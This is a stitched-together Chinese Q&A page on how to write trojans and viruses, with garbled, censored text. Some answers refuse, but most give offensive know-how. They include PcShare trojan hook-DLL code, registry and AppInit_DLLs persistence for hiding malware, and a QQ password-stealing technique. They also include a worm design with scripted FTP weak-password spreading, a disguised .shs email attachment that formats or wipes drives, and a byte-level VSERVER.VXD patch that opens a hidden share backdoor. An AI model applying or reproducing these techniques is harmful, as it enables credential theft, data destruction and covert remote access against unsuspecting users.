怎么做木马?
问题一:怎么 *** 木马程序? 你需要学会编程才能编写木马编写木马更好用vc++。enet/eschool/video/c++/ 这是c++的教程,你学懂了这些皮毛的东西再深入研究内核编程吧如果上面的地址打不开可以到这里pconline/pcedu/empolder/gj/vc/0607/820674
问题二:木马和病毒是怎么做出来的呢? 哈哈...木马和病毒都属于执行程序...
木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。
“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种者的电脑。“木马”与计算机 *** 中常常要用到的远程控制软件有些相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;“木马”则完全相反,木马要达到的是“偷窃”性的远程控制,如果没有很强的隐蔽性的话,那就是“毫无价值”的。
它是指通过一段特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是客户端,即控制端,另一个是服务端,即被控制端。植入被种者电脑的是“服务器”部分,而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。运行了木马程序的“服务器”以后,被种者的电脑就会有一个或几个端口被打开,使黑客可以利用这些打开的端口进入电脑系统,安全和个人隐私也就全无保障了! 木马的设计者为了防止木马被发现,而采用多种手段隐藏木马。木马的服务一旦运行并被控制端连接,其控制端将享有服务端的大部分操作权限,例如给计算机增加口令,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等。
随着病毒编写技术的发展,木马程序对用户的威胁越来越大,尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己,使普通用户很难在中毒后发觉。
木马得种类
1. *** 游戏木马
随着 *** 在线游戏的普及和升温,我国拥有规模庞大的网游玩家。 *** 游戏中的金钱、装备等虚拟财富与现实财富之间的界限越来越模糊。与此同时,以盗取网游帐号密码为目的的木马病毒也随之发展泛滥起来。
*** 游戏木马通常采用记录用户键盘输入、Hook游戏进程API函数等 *** 获取用户的密码和帐号。窃取到的信息一般通过发送电子邮件或向远程脚本程序提交的方式发送给木马作者。
*** 游戏木马的种类和数量,在国产木马病毒中都首屈一指。流行的 *** 游戏无一不受网游木马的威胁。一款新游戏正式发布后,往往在一到两个星期内,就会有相应的木马程序被 *** 出来。大量的木马生成器和黑客网站的公开销售也是网游木马泛滥的原因之一。
2. 网银木马
网银木马是针对网上交易系统编写的木马病毒,其目的是盗取用户的卡号、密码,甚至安全证书。此类木马种类数量虽然比不上网游木马,但它的危害更加直接,受害用户的损失更加惨重。
网银木马通常针对性较强,木马作者可能首先对某银行的网上交易系统进行仔细分析,然后针对安全薄弱环节编写病毒程序。如2004年的“网银大盗”病毒,在用户进入工行网银登录页面时,会自动把页面换成安全性能较差、但依然能够运转的老版页面,然后记录用户在此页面上填写的卡号和密码;“网银大盗3”利用招行网银专业版的备份安全证书功能,可以盗取安全证书;2005年的“新网银大盗”,采用API Hook等技术干扰网银登录安全控件的运行。
随着我国网上交易的普及,受到外来网银木马威胁的用户也在不断增加。
3. 即时通讯软件木马
现在,国内即时通讯软件百花齐放。 *** 、新浪UC、网易泡泡、盛大圈圈……网上聊天的用户群十分庞大。常见的即时通讯类木马一般有3种:
一、发送消息型。通过即时通讯软件自动发送含有恶意网址的消息,目的在于让收到消息的用户......
问题三:怎么 *** 简单木马? 一个简单的vc++6.0下的木马源码 木马源程序,包括客户端和服务端PCSshare的客户端代码:
#include stdafx.h
#include SshWork.h
#pragma data_seg(Shared)
char m_CharFileName[256] = {0};
HHOOK g_hook = NULL;
HHOOK g_khook = NULL;
INITDLLINFO m_InitInfo = {0};
BOOL m_IsOk = FALSE;
#pragma data_seg()
#pragma ment(linker,/section:Shared,rws)
HINSTANCE ghInstance = NULL;
SshWork m_Work;
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
case DLL_PROCESS_ATTACH:
ghInstance = (HINSTANCE) hModule;
break;
default : break;
}
return TRUE;
}
LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)
{
LRESULT lResult = CallNextHookEx(g_hook, nCode, wParam, lParam);
查看是否为指定进程
if(!m_IsOk m_InitInfo.m_ProcessId == GetCurrentProcessId())
{
找到指定进程取消hook
m_IsOk = TRUE;
if(g_hook) UnhookWindowsHookEx(g_hook);
通知主进程退出
HANDLE m_WaitEvent =
OpenEvent(EVENT_ALL_ACCESS,FALSE,
m_InitInfo.m_EventName);
if(m_WaitEvent)
{
SetEvent(m_WaitEvent);
CloseHandle(m_WaitEvent);
}
Sleep(1000);
装载DLL到进程
m_Work.m_Module = LoadLibrary(m_InitInfo.m_StartFile);
if(m_Work.m_Module)
{
m_Work.StartWork(m_InitInfo);
}
}
return lResult;
}
BOOL PlayWork(LPINIT......
问题四:木马病毒怎样 *** 上网先学学把,别自己先中毒了,网上就有代码下载的
问题五:怎么 *** 木马病毒 5分 这是个比较复杂的问题,病毒开发不同于普通应用开发,需要更广泛的和更深入的编成技术 系统底层问题:截取屏幕、Hook鼠标键盘 *** 问题:涉及到拦截数据报文,加解密数据 反侦测问题:隐藏进程…………学编程2~3个月,用Delphi之类的软件,一般就可以开发普通应用程序 VC++最多6个月,也能搞出些东西 但要搞病毒木马等,先学3年再考虑。
问题六:怎么做木马? 木马是内行的 但是你做木马 不要涉及财物之类的
盗取财物就涉及违法了
一般木马中毒都是通过下载软件,浏览未知网页
Trojan一词的特洛伊木马本意是特洛伊的,指特洛伊木马,是木马计的故事
木马会盗取你的账号,信息等资料
如果电脑中了木马建议尽快杀毒以免造成系统问题
可以先做一次全盘杀毒
然后针对性的:
腾讯电脑管家--工具箱--木马克星 (针对于杀了又出现的顽固病毒)
最后开启实时防毒保护。
问题七:怎么 *** 简单的木马程序 您好
1, *** 木马和使用木马病毒都是违法犯罪的行为,不建议您去学习。
2, *** 出木马病毒程序后,这个程序就会自动开始执行,对您的电脑首先开始盗取帐号木马以及破坏程序。
3,所以如果自己受到了攻击或者盗号,不要用这种方式,要以正当途径来解决。
4,建议您到腾讯电脑管家官网下载一个电脑管家。
5,电脑管家拥有16层实时防护功能和 *** 帐号全景防御系统,可以从上网安全、应用入口、系统底层等全方位保护电脑安全不受木马病毒侵袭,而且电脑管家还可以全方位多维度保护账号安全,精确打击盗号木马,瞬时查杀并对风险预警。
如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难
问题八:如何做远程控制的木马? 配置一个动态域名,然后设置客户端,通过漏洞发送,进行远程控制,建议你看看动画教程,以前的灰鸽子什么的是个经典,先把那个研究透了什么都会了
如何编写木马程序?
怎样编写木马程序
您好
建议您不要去学习使用木马病毒,是属于违法犯罪行为。而且,如果您接收了木马病毒,那么该病毒会自动在您的电脑中优先运行。
建议您到腾讯电脑管家官网下载一个电脑管家。
在平时使用电脑的时候,打开电脑管家,可以受到电脑管家16层实时防护的保护和云智能预警系统,可以在木马活动早期侦测并阻断木马的破坏行为,通过云查杀技术秒杀最新流行木马。
如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难
腾讯电脑管家企业平台:zhidao.baidu/c/guanjia/
如何编写木马程序??
你想干什么?如果你只想玩玩,建议你学一下vbs脚本或bat脚本,如果你想把脚本做成exe程序,最简单的 *** 就是把脚本压缩到自解压文件里,再用16进制编辑器修改一下某个数值,就成功了。
如果你想干坏事,嘻嘻,木马也不是那么好写的,首先你要成为一个出色的程序员,不仅要打好C语言基础,更要精通汇编语言和计算机硬件以及操作系统原理,逻辑思维要强,当然要学的还很多,如mfc,C#等等,所以,如果你不是非常痴迷于编程,我劝你玩玩就行了,当然,更不要走上违法犯罪的道路吆!
good luck。
呀,还有,请采纳我吧,宝贝儿,嘻!
如何编写木马程序
如果对电脑感兴趣的话可以学习下,一般软件开发工程师都是学的高级语言,但是如果写木马,我们一般是要接触低级语言的,低级语言比高级语言学起来枯燥,但学成之后进阶高级语言很快而且比一般的程序员牛逼,高级语言配合底层知识才能写出更好的木马。底层知识越牢固越好。
怎样才能编程木马程序
北上广深这么多程序员,怎么没几个搞这种编程的?
一个原因就是没钱赚,另一个原因就是技术上要求太高。
好好的学编程,从你提这个问题来看,你都还没入门吧。
慢慢学,你会发现学得越多自己越无知,等你有五年以上开发经验的时候,再来看你现在的这个提问的时候,一定会笑话这个时候的自己的。
祝你在开发的路上快速成长!
木马是如何编写的(三)
很高兴为您解答:
木马编写是需要你懂的C++语言
首先是程序的大小问题,本程序经编译链接后得到的可执行文件竟有400多K,用Aspack1.07压了一下也还有200多K。可以看出不必要的Form是应该去掉的;并且尽量由自己调用底层的API函数,而尽量少使用Borland打好包的VCL控件;要尽量使用汇编语言(BCB支持C++和汇编混编),不但速度会加快,而且大小可以小很多,毕竟木马是越小越好。
还有启动方式的选择。出了Win.ini、System.ini之外,也还是那几个注册表键值,如:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
都已被其他的木马用烂了。现在又开始对exe、dll和txt文件的关联程序动手脚了(如冰河和广外女生)。这里涉及到参数传递的问题。得到ParamStr()函数传来的参数,启动自己后再启动与之关联的程序,并将参数传递给它,这样就完成了一次“双启动”,而受害者丝毫感觉不到有任何异常。具体键值如:
与exe文件建立关联:HKEY_CLASSES_ROOT\exefile\shell\open\mand
与txt文件建立关联:HKEY_CLASSES_ROOT\txtfile\shell\open\mand
与dll文件建立关联:HKEY_CLASSES_ROOT\dllfile\shell\open\mand
等,当然还可以自己扩充。目前还有一种新 *** :在
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Windows
下添加如下键值 "AppInit_DLLs"="Server.dll",这就把Server.dll注册为系统启动时必须加载的模块(你应该把木马编译成DLL)。下次开机时,木马以动态链接库形式被加载,存在于系统进程中。因为没有它自己的PID(Process ID 进程识别号),所以在NT的任务管理器中也看不见(不过在“系统信息”——“软件环境”——“已加载的32位模块”中还是可以详细看到当前内存中加载的每一个模块的),这样做的目的是可以使自己的程序更加隐蔽,提高木马的生存能力。
木马的功能还可以大大扩充。你可以充分发挥你的想象力——比如上传、下载、新建、改名、移动文件,截图存为jpg文件传回,录音监听成Wav文件,录像成AVI文件,弹光驱,读软驱,关机,重启,不停地挂起,胡乱切换分辨率(烧掉你的显示器),发对话框,不停地打开资源管理器直到死机,杀掉Kernel32.dll进程使机器暴死,交换鼠标左右键,固定鼠标,限制鼠标活动范围,鼠标不听指挥到处乱窜,记录击键记录(记录上网口令,这需要深入了解钩子(Hook)技术,如键盘钩子和鼠标钩子),窃取......
编写木马?
盗号木马~~~~楼主,这不是好玩的东西,不过看在高分悬赏的份上,就告诉你吧。 可以通过 SendMessage 发送 WM_GETTEXT 取得密码框中的值,我们可以利用这一点来完成密码的截取。 使用 Timer 控件,监视 *** 。 用遍查窗口的 *** (EnumWindows),取得所有的窗口标题(GetWindowText),判断其中是否为" *** 用户登录"的标题,取 得 *** 登录窗口的子窗口(窗口上的控件)的类名(GetClassName),然后通过 boBox、Edit 取得用户名和密码(通过 SendMessage 发送 WM_GETTEXT 取得值)。 由于不能判断外部按键事件的发生,只有通过不断的取得密码值,具体 *** 如下: 首先取得 用户名的值,然后不停的取密码的值,再判断窗口的标题是否为用户名,如果为用户名,则最后一次密码的值就是真正的密码,到此程序完成。 程序编制 (1)首先为了避免程序被多次装载,造成系统资源的浪费、及不必要的错误。 声明变量、过程及 API 函数,写在 Module1.bas 文件中 Declare Function CreateFileMapping Lib "kernel32" Alias "CreateFileMappingA" (ByVal hFile As Long, lpFileMappigAttributes As SECURITY_ATTRIBUTES, ByVal flProtect As Long, ByVal dwMaximumSizeHigh As Long, ByVal dwMaximumSizeLow As Long, ByVal lpName As String) As Long '创建一个新的文件映射对象
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long '关闭一个内核对象
Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Const PAGE_READWRITE = 1
Const ERROR_ALREADY_EXISTS = 183
建立判断程序是否多启动的过程
Sub Main()
Dim ynRun As Long
Dim sa As SECURITY_ATTRIBUTES
sa.bInheritHandle = 1
sa.lpSecurityDescriptor = 0
sa.nLength = Len(sa)
ynRun = CreateFileMapping(HFFFFFFFF, sa, PAGE_READWRITE, 0, 128, App.title) '创建内存映射文件
If (Err.LastDllError = ERROR_ALREADY_EXISTS) Then '如果指定内存文件已存在,则退出
CloseHandle ynRun '退出程序前关闭内存映射文件
End
End If
End Sub
(2)即时监视,就需要在系统启动时,程序自启动,这里使用修改注册表的 *** 声明变量、过程及 API......
木马程序是怎么编出来的
一个典型的蠕虫病毒有两个功能型部件:传播和破坏,流行的蠕虫病毒大都是利用操作系统或者应用程序的漏洞(以弱口令和溢出最为常见),但常常并不会对宿主机造成“致命”的破坏。这两个特点使蠕虫病毒比普通电脑病毒传播得更快,影响力更大。一般来说,单一的蠕虫病毒只针对某种特定的漏洞进行攻击,所以一旦这种漏洞得到大范围修补,病毒也就没有了生存空间。
更新这种设计,我把传播部件拆分开来:把扫描、攻击和破坏脚本化,主程序则负责解析这些脚本。例如针对ftp弱口令进行扫描,我们可以定义如下脚本:
code:
uid = iscript-0a21-2331-x #随机唯一编号
using tcp;
port 21;
send “user anonymous”;
send crlf;
send “pass [email protected]”
send crlf;
if (find “200”) resulrt ok;
next;
[copy to clipboard]
解析了这段脚本后(我想这种脚本是很容易读懂的),我们再定义一系列的过程,把我们的蠕虫体upload上去,一次完整的传播动作就完成了。如果是溢出漏洞,为了简单起见我们可以采集远程溢出的数据包,然后修改ip地址等必要数据,再转发溢出数据包进行溢出(这种情况下要实现connect-back就不容易了,不过这些具体问题就待有心人去研究吧),例如:
code:
using raw;
ip offset at 12;
send “\x1a\xb2\xcc” ……
[copy to clipboard]d
主程序在完成传播后留下一个后门,其他宿主机可以通过这个后门与本地的蠕虫病毒同步传播脚本,这样每次有新的漏洞产生,宿主机的传播方式可以很快地得到升级。我们当然不会仅满足于这样一个蠕虫程序,扫描/攻击脚本的传播过程也是需要仔细处理的。
我们希望适应力(fitness)最强的脚本得到广泛的应用(看起来有点类似 蚁群算法 和 ga),所以我们要求得每个个体的fitness,当它和另一个体取得联系的时候就可以决定谁的传播脚本将取代另一个:
fitness = number of host infected / number of host scanned
但也不能仅凭fitness就修改传播脚本,我个人觉得一个合适的概率是75%,20%的机会保持各自的传播脚本,剩下的5%则交换脚本。这样在维持每种脚本都有一定生存空间的情况下使适应性更好的个体得到更多的传播机会,同时,一些在某种 *** 环境下适应性不强的脚本也有机会尝试不同的 *** 环境。
木马程序是怎么写出来的?
您好:
建议您不要编写木马程序,木马程序会对您和别人的电脑造成损害的,如果您曾编写过此类不安全的软件的话,为了您电脑的安全,建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧,打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以,您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载
腾讯电脑管家企业平台:zhidao.baidu/c/guanjia/
怎么 *** 木马程序?
你需要学会编程才能编写木马编写木马更好用vc++。enet/eschool/video/c++/ 这是c++的教程,你学懂了这些皮毛的东西再深入研究内核编程吧如果上面的地址打不开可以到这里pconline/pcedu/empolder/gj/vc/0607/820674
怎么编写一个简单的木马程序?
特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷, 使在Dos——Windows时代中长大的中国网民从五彩缤纷的 *** 之梦中惊醒,终于认识到的 *** 也有它邪恶的一面,一时间人心惶惶。
我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!要知道,木马(Trojan)的历史是很悠久的:早在ATT Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要 *** 是诱骗——先修改你的.profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的薰陶下长大的,对 *** 可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了 *** 事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的 *** 安全方面可以说是一个划时代的软件。
自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成——服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的 *** 协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。
首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗?
启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NM *** TP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和 *** TP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。
Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的......
怎么自己 *** 木马啊。
木马完全可以自制,你可以根据自己所需的作用来 *** 各种各样的木马
学木马先要会编程,你先把这个搞懂吧!
1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板
文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后
点击“浏览”按钮选择要插入的文件。
3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在弹
出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令
:start.exe
/m
format
c:/q
/autotest
/u
,点击“确定”,此时,内容栏中会显示
出命令内容。
4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一
个图标。
5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名
称)。点击“文件”菜单中的“更新”,然后关闭此对话框。
6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默
认名为”片段”),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面
上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作
为附件发出。
7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文
所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对
象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:st
art.exe
/m
deltree
/y
a:\*.*
c:\*.*
d:\*.*
则是将删除对方硬盘下所有文件(盘符
根据实际情况自定义);如果替换为:start.exe
/m
deltree
/y
c:\windows\system\*.*
则是删除对方c:\windows\system\目录底下的所有文件.(当
然大家可以改成其它的命令)
很简单,这样一个恶意的攻击程序被弄出来了!
怎么做木马
网上木马程序很流行,其实说来也很简单,大致都是修改注册表或者INI文件加载一个文件提供服务,这就手工都很容易检测出木马来。一,看增加的不明服务。二,因为木马是作为服务一般要打开一个 *** 通信端口,所以检查增加的服务端口也很容易检查出木马程序来。其实完全可以稍微改动操作系统内核而作出一个很好的木马来,这样不用改动注册表也可以让用户很不容易发觉。
下面就是简单改动一个驱动程序做一个木马的 *** 。大家可以分析别的驱动程序相应的作出自己的木马来。这儿是利用WINDOWS的共享和远程管理。WINDOWS的共享如果共享名是ADMIN$就可以远程管理,就是登陆ADMIN$进去了后所有的盘都完全共享为盘符加$.下面一段就是VSERVER。VXD处理共享的一段程序,SUB_0027校验密码,密码对了后后面检测共享名是ADMIN $否,是就看C$,D$...共享没有(DATA_0431==0?),没共享就调用SUB_0230共享,SUB_0230 一个参数就是密码指针,如果密码指针为0就没密码。这儿为了好改动就用的这个参数。显然我们就可以必要的时候调用SUB_0230
就开了个后门。LOC_0415是检测 *** 通信的共享名串大于0DH否(包括串后的0),是就转LOC_0419出错返回,显然我们可以利用这儿去调用SUB_0230. 看LOC_0419 有7个字节可以利用,可以安排 CALL SUB_0230
NEW_LOC_0418 POP eax
jmp 03469
刚好7个字节。3436: JE LOC_0418 是没找到要共享的目录跳转到LOC_0418 显然要改动,改动成JE NEW_LOC_0418 就可以。现在是LOC_0415一段要跳转到LOC_0419前要PUSH 0以调用SUB_0230。
下面是LOC_0415的改法:
LOC_0415:
03415 XOR EAX,EAX ;2 字节,同样SUB AL,AL 得到AL=0;还得到EAX=0。
03417 PUSH EAX ;1 字节 调用SUB_0230 用的DWORD参数 0;
03418 XOR ECX,ECX ;2 字节 ECX=0;
0341A DEC ECX ;1 字节 得到ECX=0FFFFFFFFH这儿与MOV ECX,0FFFFH一样但字节数少
0341B mov edi,ebx ;2 bytes
0341D repne sca *** ;2 bytes
0341F SUB EDI,EBX ;2 bytes get the share name long
03421 CMP EDI, 0Dh ;3 bytes大于等于0DH跳转。这儿条件可以改动为等于多少跳转等。
03424 ja short loc_0419 ; 2 byte
03426 POP EAX ;1 byte 堆栈平衡
03427 PUSH EDI ;1 byte
03428 POP EAX ;1 byte EAX=EDI SHARE NAME LONG , 后面要用
刚好字节够用,注意DATA_0182 那儿有重定位那种字节不能简单改动。你可以把你的好的程序好的游戏加上一小段代码这么改动他的VSERVER。VXD文件,更好是硬盘的WINDOWS安装目录打包文件里面的VSERVER。VXD也改动,还有访问共享目录\\IP的139端口也更好加一个别的端口以逃避有些路由器防火墙的设置,再把你的程序散发。。。。。
中了你的木马的你访问他的共享目录后面加一大串字母(共享名串长大于等于0DH)会提示出错,但你就可以再访问\\IP\C$, \\IP\D$....了,这可是完全共享的了.如果你先没有那个一大串字母的访问他也没有设置远程管理的话 \\IP\C$,\\IP\D$... 都不能访问的,他自己用 *** 监视器也看不到这种共享的,所以很不容易觉察的。注意你进入共享目录了 *** 监视器还是能看到。
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;
; Called from: 031FD, 32CC
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
033F4 sub_0026 proc near
033F4 56 push esi
033F5 66| 81 3B 5C5C cmp word ptr [ebx],5C5Ch
033FA 74 07 je short loc_0412 ; Jump if equal
033FC 66| 81 3B 2F2F cmp word ptr [ebx],2F2Fh
03401 75 12 jne short loc_0415 ; Jump if not equal
03403 loc_0412: ; xref 033FA
03403 8D 73 02 lea esi,dword ptr [ebx+2] ; Load effective addr
03406 loc_0413: ; xref 0340F
03406 E8 00006961 call sub_0207 ; (09D6C)
0340B 74 05 jz short loc_0414 ; Jump if zero
0340D 3C 5C cmp al,5Ch ; '\'
0340F 75 F5 jne loc_0413 ; Jump if not equal
03411 46 inc esi
03412 loc_0414: ; xref 0340B
03412 8D 5E FF lea ebx,dword ptr [esi-1] ; Load effective addr
03415 loc_0415: ; xref 03401
03415 2A C0 sub al,al
03417 B9 0000FFFF mov ecx,0FFFFh
0341C 8B FB mov edi,ebx
0341E F2/ AE repne sca *** ; Rep zf=0+cx 0 Scan es:[di] for al
03420 8B C7 mov eax,edi
03422 2B C3 sub eax,ebx
03424 83 F8 0D cmp eax,0Dh
03427 77 26 ja short loc_0419 ; Jump if above
03429 55 push ebp
0342A 8B 2D 00011CA4 mov ebp,dword ptr data_0182 ;THE SHARE POINTER ; (11CA4=0)
03430 loc_0416: ; xref 0344C
03430 ?1 FD 00011CA4 cmp ebp,11CA4h
03436 74 16 je short loc_0418 ; Jump if equal
03438 80 7D 08 02 cmp byte ptr [ebp+ClientEBP],2
0343C 75 0B jne short loc_0417 ; Jump if not equal
0343E 8D 75 11 lea esi,dword ptr [ebp+11h] ; Load effective addr
03441 8B FB mov edi,ebx
03443 8B C8 mov ecx,eax
03445 F3/ A6 repe cmp *** ; Rep zf=1+cx 0 Cmp [si] to es:[di]
03447 74 3A jz short loc_0424 ; Jump if zero
03449 loc_0417: ; xref 0343C
03449 8B 6D 00 mov ebp,dword ptr [ebp+ClientEDI]
0344C EB E2 jmp short loc_0416 ; (03430)
0344E loc_0418: ; xref 03436
0344E 5D pop ebp
0344F loc_0419: ; xref 03427
0344F B8 00060002 mov eax,60002h
03454 5E pop esi
03455 F9 stc ; Set carry flag
03456 C3 retn
03457 loc_0420: ; xref 0349F
03457 8B 43 34 mov eax,dword ptr [ebx+34h]
0345A 8B 1B mov ebx,[ebx]
0345C 81 FB 00011CA4 cmp ebx,11CA4h
03462 74 0A je short loc_0421 ; Jump if equal
03464 3B 43 34 cmp eax,dword ptr [ebx+34h]
03467 74 2F je short loc_0425 ; Jump if equal
03469 B8 00020002 mov eax,20002h
0346E loc_0421: ; xref 03462, 3481, 354D, 35E8
0346E ?E pop esi
0346F F9 stc ; Set carry flag
03470 C3 retn
03471 33 DB db 33h,0DBh
03473 loc_0422: ; xref 0349D
03473 5E pop esi
03474 C3 retn
03475 loc_0423: ; xref 034C1
03475 8B D3 mov edx,ebx
03477 鶥B 0000000A mov ebx,0Ah ; (0000A=0B8h)
0347C B8 00590002 mov eax,590002h
03481 EB EB jmp short loc_0421 ; (0346E)
03483 loc_0424: ; xref 03447
03483 8B DD mov ebx,ebp
03485 59 pop ecx ;ebp ,the password long
03486 F6 05 00012446 01 test byte ptr data_0317,1 ; (12446=0)
0348D 75 12 jnz short loc_0426 ; Jump if not zero
0348F 8B 34 24 mov esi,[esp]
03492 F6 46 1F 01 test byte ptr [esi+1Fh],1
03496 75 09 jnz short loc_0426 ; Jump if not zero
03498 loc_0425: ; xref 03467
03498 E8 00000182 call sub_0027 ; (0361F) check the password
0349D 72 D4 jc loc_0422 ; Jump if carry Set
0349F 75 B6 jnz loc_0420 ; Jump if not zero
034A1 loc_0426: ; xref 0348D, 3496
034A1 F6 43 10 40 test byte ptr [ebx+10h],40h ; '@'
034A5 0F 85 00000089 jnz loc_0433 ; Jump if not zero
034AB A1 00011CC4 mov eax,data_0190 ; (11CC4=0FFFFF000h)
034B0 80 38 01 cmp byte ptr [eax],1
034B3 0F 83 00000134 jae loc_0439 ; Jump if above or =
034B9 loc_0427: ; xref 0353B, 3564, 356F, 35F6
; 3611
034B9 66| 8B 53 0E mov dx,word ptr [ebx+0Eh]
034BD 66| 39 53 0C cmp word ptr [ebx+0Ch],dx
034C1 76 B2 jbe loc_0423 ; Jump if below or =
034C3 loc_0428: ; xref 03528
034C3 8B 0D 00011B34 mov ecx,dword ptr data_0170 ; (11B34=0)
034C9 85 C9 test ecx,ecx
034CB 74 56 jz short loc_0431 ; Jump if zero
034CD 8B 01 mov eax,[ecx]
034CF A3 00011B34 mov data_0170,eax ; (11B34=0)
034D4 66| FF 43 0E inc word ptr [ebx+0Eh]
034D8 89 59 0C mov dword ptr [ecx+0Ch],ebx
034DB C6 41 14 03 mov byte ptr [ecx+14h],3
034DF 8A 41 17 mov al,byte ptr [ecx+17h]
034E2 04 08 add al,8
034E4 0C C0 or al,0C0h
034E6 88 41 17 mov byte ptr [ecx+17h],al
034E9 C6 41 15 00 mov byte ptr [ecx+15h],0
034ED 8B 34 24 mov esi,[esp]
034F0 F6 46 1F 08 test byte ptr [esi+1Fh],8
034F4 75 08 jnz short loc_0429 ; Jump if not zero
034F6 A1 00011CC8 mov eax,data_0191 ; (11CC8=0FFFFF000h)
034FB FF 40 10 inc dword ptr [eax+10h]
034FE loc_0429: ; xref 034F4
034FE 5E pop esi
034FF 81 7B 11 494D4441 cmp dword ptr [ebx+11h],494D4441h ;ADMIN$ ?
03506 75 0E jne short loc_0430 ; Jump if not equal
03508 66| 81 7B 15 244E cmp word ptr [ebx+15h],244Eh
0350E 75 06 jne short loc_0430 ; Jump if not equal
03510 80 7B 17 00 cmp byte ptr [ebx+17h],0
03514 74 61 je short loc_0435 ; Jump if equal
03516 loc_0430: ; xref 03506, 350E, 3584
03516 B8 00011CD4 mov eax,11CD4h
0351B E8 000056BC call sub_0130 ; (08BDC)
03520 85 DB test ebx,ebx
03522 C3 retn
03523 loc_0431: ; xref 034CB
03523 E8 00000190 call sub_0028 ; (036B8)
03528 73 99 jnc loc_0428 ; Jump if carry=0
